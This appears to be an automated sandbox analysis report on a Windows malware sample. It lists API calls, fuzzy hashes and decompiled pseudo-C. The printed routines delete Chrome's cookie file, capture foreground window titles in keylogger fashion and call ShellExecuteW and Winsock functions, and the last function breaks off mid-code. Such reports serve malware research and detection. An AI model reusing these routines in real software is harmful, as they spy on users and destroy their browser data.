                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$V10@0@$??0?$basic_string@$?c_str@?$basic_string@?data@?$basic_string@CreateD@1@@FileG@2@@std@@G@std@@KeyboardLayoutNameV01@@V10@V10@@_itoa
                                                                                • String ID:
                                                                                • API String ID: 3751107300-0
                                                                                • Opcode ID: 408225e8519de02d29d67407c5278573f5b0eacb6e86d161ac775c050189f6ac
                                                                                • Instruction ID: 7445f7784f172681db4ab6ed8b3104eac86986a278aabc0f04733adb6ce879a5
                                                                                • Opcode Fuzzy Hash: 408225e8519de02d29d67407c5278573f5b0eacb6e86d161ac775c050189f6ac
                                                                                • Instruction Fuzzy Hash: 39310EB280051DABCB05ABE1EC49EEEBB7CBB54305F04447AF506E3061EF745689CB69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetWindowTextW.USER32 ref: 0040EAAF
                                                                                • IsWindowVisible.USER32(?), ref: 0040EAB8
                                                                                • sprintf.MSVCRT ref: 0040EACF
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?), ref: 0040EAE6
                                                                                  • Part of subcall function 00412855: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412860
                                                                                  • Part of subcall function 00412855: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 0041286C
                                                                                  • Part of subcall function 00412855: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412876
                                                                                  • Part of subcall function 00412718: _itoa.MSVCRT ref: 00412736
                                                                                  • Part of subcall function 00412718: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,0040CC05,?,00000000,0041B310,00000000,0041B310,?), ref: 0041274A
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,004169C4,?,004169C4,00000000,004169C8), ref: 0040EB20
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,004169C4,00000000,004169C8), ref: 0040EB2D
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,00000000,004169C8), ref: 0040EB3A
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EB47
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EB57
                                                                                • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EB65
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EB71
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EB7A
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EB83
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EB8C
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EB95
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EB9E
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EBA7
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EBB0
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$G@2@@std@@G@std@@V10@$??0?$basic_string@$D@1@@Window$?c_str@?$basic_string@?length@?$basic_string@G@1@@TextV01@V01@@V10@0@VisibleY?$basic_string@_itoasprintf
                                                                                • String ID:
                                                                                • API String ID: 1480451481-0
                                                                                • Opcode ID: 5159a5ed7c6a575ed3fd98bb9d52d8aef8cef27cad9d46fb2674fe92d0d4bc58
                                                                                • Instruction ID: 896110e7d44d4e8721ff4af176c5386cc18dfd6a0cdb0307768c484521d74486
                                                                                • Opcode Fuzzy Hash: 5159a5ed7c6a575ed3fd98bb9d52d8aef8cef27cad9d46fb2674fe92d0d4bc58
                                                                                • Instruction Fuzzy Hash: 0031BEB2C0060DEBDB05ABE0EC49DDE7B7CAB54305F108026F526E6061EB759699CB68
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00000000,00000000,00416980), ref: 0040D665
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000003), ref: 0040D68C
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000002,00000000), ref: 0040D69F
                                                                                  • Part of subcall function 004135DE: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 004135EE
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040D6BA
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040D6C3
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040D6D9
                                                                                  • Part of subcall function 00412E4E: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,00000000,?,?,00411AD6), ref: 00412E5A
                                                                                  • Part of subcall function 00412E4E: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,00411AD6), ref: 00412E64
                                                                                  • Part of subcall function 00412E4E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00412E78
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001), ref: 0040D6F3
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,00000000,00000001), ref: 0040D704
                                                                                • ShellExecuteW.SHELL32(00000000,open,00000000), ref: 0040D711
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,00000000), ref: 0040D71A
                                                                                • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00000000,00000000,0041697C), ref: 0040D734
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040D74B
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000), ref: 0040E6AC
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                                                                  • Part of subcall function 00412881: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BA38,0041BCB0,00000000,0040903C,004140D8,00000000,0000000B), ref: 0041288D
                                                                                  • Part of subcall function 00412881: ??2@YAPAXI@Z.MSVCRT ref: 0041289B
                                                                                  • Part of subcall function 00412881: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128BD
                                                                                  • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 004128DF
                                                                                  • Part of subcall function 00412881: ??3@YAXPAX@Z.MSVCRT ref: 004128E6
                                                                                  • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128F3
                                                                                  • Part of subcall function 00412881: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128FC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$G@2@@std@@G@std@@$?c_str@?$basic_string@$??1?$basic_string@$??0?$basic_string@$??8std@@D@2@@0@G@1@@V01@@V?$basic_string@$??2@??3@?length@?$basic_string@?size@?$basic_string@ExecuteShell
                                                                                • String ID: open
                                                                                • API String ID: 2112629403-2758837156
                                                                                • Opcode ID: e0b4ccf5b81036f06e82adf55bc2754796fbdd6e0c7d7cf8e753f00f06615192
                                                                                • Instruction ID: 3c6387fd113382c931602557de23b741b53e110e960cdbc023917b4df3b65b40
                                                                                • Opcode Fuzzy Hash: e0b4ccf5b81036f06e82adf55bc2754796fbdd6e0c7d7cf8e753f00f06615192
                                                                                • Instruction Fuzzy Hash: 94317C72910519EBCB04BBE1EC999FE7778AF54356B40487EF412A30E1EE785A04CB28
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 32%
                                                                                			E004071CF() {
                                                                                				char _v5;
                                                                                				char _v6;
                                                                                				char _v24;
                                                                                				void* _v40;
                                                                                				char* _t12;
                                                                                				CHAR* _t13;
                                                                                				long _t20;
                                                                                				char* _t21;
                                                                                				void* _t25;
                                                                                
                                                                                				_t12 = getenv("UserProfile");
                                                                                				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(_t12,  &_v5, "\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies");
                                                                                				_t13 =  &_v24;
                                                                                				L00414170();
                                                                                				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t13, _t12);
                                                                                				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                                                                				if(DeleteFileA(_t13) != 0) {
                                                                                					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_v6);
                                                                                					E00407A90("\n[Chrome Cookies found, cleared!]");
                                                                                					_t25 = 1;
                                                                                					L8:
                                                                                					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                                                                					return _t25;
                                                                                				}
                                                                                				_t20 = GetLastError();
                                                                                				if(_t20 == 0) {
                                                                                					_t21 =  &_v6;
                                                                                					L5:
                                                                                					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(_t21);
                                                                                					E00407A90("\n[Chrome Cookies not found]");
                                                                                					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                                                                					return 1;
                                                                                				}
                                                                                				if(_t20 == 1) {
                                                                                					_t21 =  &_v5;
                                                                                					goto L5;
                                                                                				}
                                                                                				_t25 = 0;
                                                                                				goto L8;
                                                                                			}













                                                                                APIs
                                                                                • getenv.MSVCRT ref: 004071E4
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000), ref: 004071EF
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 004071FA
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407205
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040720E
                                                                                • DeleteFileA.KERNEL32(00000000), ref: 00407215
                                                                                • GetLastError.KERNEL32 ref: 0040721F
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Chrome Cookies not found],00000000), ref: 0040723E
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040724F
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Chrome Cookies found, cleared!],00000000), ref: 00407271
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407284
                                                                                Strings
                                                                                • [Chrome Cookies not found], xrefs: 00407239
                                                                                • [Chrome Cookies found, cleared!], xrefs: 0040726C
                                                                                • UserProfile, xrefs: 004071DF
                                                                                • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 004071D9
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??0?$basic_string@??1?$basic_string@D@1@@$?c_str@?$basic_string@D@2@@0@DeleteErrorFileHstd@@LastV10@V?$basic_string@getenv
                                                                                • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                                                • API String ID: 3740952235-304995407
                                                                                • Opcode ID: 83c02d717cdcb3f1c877865c0182a46ec50423f0379789e6a2c4cf626d65b589
                                                                                • Instruction ID: 500589693ed1866fcec617c4cf6893fdd7c78fd48f7414b1be1692f61b7e1039
                                                                                • Opcode Fuzzy Hash: 83c02d717cdcb3f1c877865c0182a46ec50423f0379789e6a2c4cf626d65b589
                                                                                • Instruction Fuzzy Hash: AE119375D04609EBCB00FBA0DD4E9FE7738EA94741750007AF812E31D1EB796A45CAAB
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 32%
                                                                                			E0041203B(char _a4, char _a20) {
                                                                                				struct _SYSTEMTIME _v20;
                                                                                				char _v36;
                                                                                				char _v52;
                                                                                				char _v68;
                                                                                				char _v84;
                                                                                				int _t18;
                                                                                				char* _t26;
                                                                                				char* _t27;
                                                                                				char* _t28;
                                                                                				char* _t29;
                                                                                
                                                                                				if( *0x41bcac != 0) {
                                                                                					GetLocalTime( &_v20);
                                                                                					_t3 =  &(_v20.wSecond); // 0x4051ef
                                                                                					_t26 =  &_v84;
                                                                                					L00414176();
                                                                                					_t27 =  &_v68;
                                                                                					L00414170();
                                                                                					_t28 =  &_v52;
                                                                                					L00414140();
                                                                                					_t29 =  &_v36;
                                                                                					L00414170();
                                                                                					__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t29, _t28, _t28, _t27, _t27, _t26, _t26, "%02i:%02i:%02i:%03i ",  &_a4, " ",  &_a20, 0x415770, _v20.wHour & 0x0000ffff, _v20.wMinute & 0x0000ffff,  *_t3 & 0x0000ffff, _v20.wMilliseconds & 0x0000ffff);
                                                                                					_t18 = printf(_t29);
                                                                                					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                                                                					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                                                                					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                                                                					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                                                                				}
                                                                                				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                                                                				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                                                                				return _t18;
                                                                                			}














                                                                                APIs
                                                                                • GetLocalTime.KERNEL32(?), ref: 00412052
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,%02i:%02i:%02i:%03i ,?,00416BFC,?,00415770,?,?,Q@,?), ref: 00412087
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,Q@,?), ref: 00412094
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,Q@,?), ref: 004120A1
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,Q@,?), ref: 004120AE
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,Q@,?), ref: 004120B8
                                                                                • printf.MSVCRT ref: 004120BF
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120CB
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120D4
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120DD
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120E6
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120EF
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120F8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$V10@$?c_str@?$basic_string@LocalTimeV10@0@V10@@printf
                                                                                • String ID: %02i:%02i:%02i:%03i $Q@
                                                                                • API String ID: 4249031962-3186260181
                                                                                • Opcode ID: c84b80c73e41f326376e78c5e9687590ff294f2bda796e8098bc6b7d81fc5b38
                                                                                • Instruction ID: f3ca9ea98f16ce9d12e0c862744fbe2e8a9e2291361fb12ebe279ffe92a69474
                                                                                • Opcode Fuzzy Hash: c84b80c73e41f326376e78c5e9687590ff294f2bda796e8098bc6b7d81fc5b38
                                                                                • Instruction Fuzzy Hash: 9311D3B680011DFBCF01EBE1EC49DEF7B7CBA54745B044026F912D2061EB789699CB54
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                  • Part of subcall function 00402010: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,00000000,?,?,0040E823,00000001,?,00000000), ref: 0040201E
                                                                                  • Part of subcall function 0040209B: #4.WS2_32(0041BE70,0041BE74,00000010,?,0041B320,?,0040CA5C), ref: 004020B1
                                                                                • ?empty@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE_NXZ.MSVCP60 ref: 00405853
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00405868
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 00405874
                                                                                  • Part of subcall function 00412DDF: CreateFileW.KERNELBASE(000177DE,80000000,00000003,00000000,00000003,00000080,00000000,00000000,000177DE,?,00409C9F,00000000), ref: 00412DF9
                                                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000012), ref: 00405898
                                                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004058AE
                                                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 004058B7
                                                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 004058CC
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 004058D6
                                                                                  • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000001,?,?,00000000,00408CAD,00000000), ref: 004030B4
                                                                                  • Part of subcall function 0040309E: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 004030C0
                                                                                  • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000000), ref: 004030D5
                                                                                  • Part of subcall function 0040309E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004030DE
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,0041B310), ref: 00405902
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?), ref: 00405922
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040590C
                                                                                  • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                                                                  • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,0041B310), ref: 00405943
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040594D
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?), ref: 00405963
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405974
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040597F
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,0041B310), ref: 00405994
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@D@2@@0@Hstd@@V10@0@V?$basic_string@$?c_str@?$basic_string@D@1@@$?data@?$basic_string@?length@?$basic_string@G@2@@std@@G@std@@V01@@$?empty@?$basic_string@CreateFile
                                                                                • String ID:
                                                                                • API String ID: 2524636154-0
                                                                                • Opcode ID: a7fcdd5d29a1b382f6ef33917f0bc90febd8d745188de50769b0dd42fa64b31e
                                                                                • Instruction ID: a7298ed754ce3842782531f55b1250d517e56450e3269786ed83483861d592cb
                                                                                • Opcode Fuzzy Hash: a7fcdd5d29a1b382f6ef33917f0bc90febd8d745188de50769b0dd42fa64b31e
                                                                                • Instruction Fuzzy Hash: 034152B2D00508ABCB05FBA1ED5A9EE7738DF54304B10407AE912B71D2EB795F48CB99
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 30%
                                                                                			E00412F73(char _a4, void* _a20) {
                                                                                				char _v5;
                                                                                				void* _v24;
                                                                                				char _v40;
                                                                                				int _t26;
                                                                                				int _t29;
                                                                                				void* _t37;
                                                                                				unsigned int _t66;
                                                                                				signed int _t67;
                                                                                				int _t70;
                                                                                				signed short _t73;
                                                                                				struct HWND__* _t81;
                                                                                				void* _t83;
                                                                                
                                                                                				_t81 = GetForegroundWindow();
                                                                                				_t26 = GetWindowTextLengthA(_t81);
                                                                                				_t89 = _t26;
                                                                                				if(_t26 <= 0) {
                                                                                					L6:
                                                                                					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                                                                					return 0;
                                                                                				}
                                                                                				_t28 = _t26 + 1;
                                                                                				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z( &_v5);
                                                                                				__imp__?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
                                                                                				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                                                                				_t29 = GetWindowTextA(_t81, _t26 + 1, _t26 + 1);
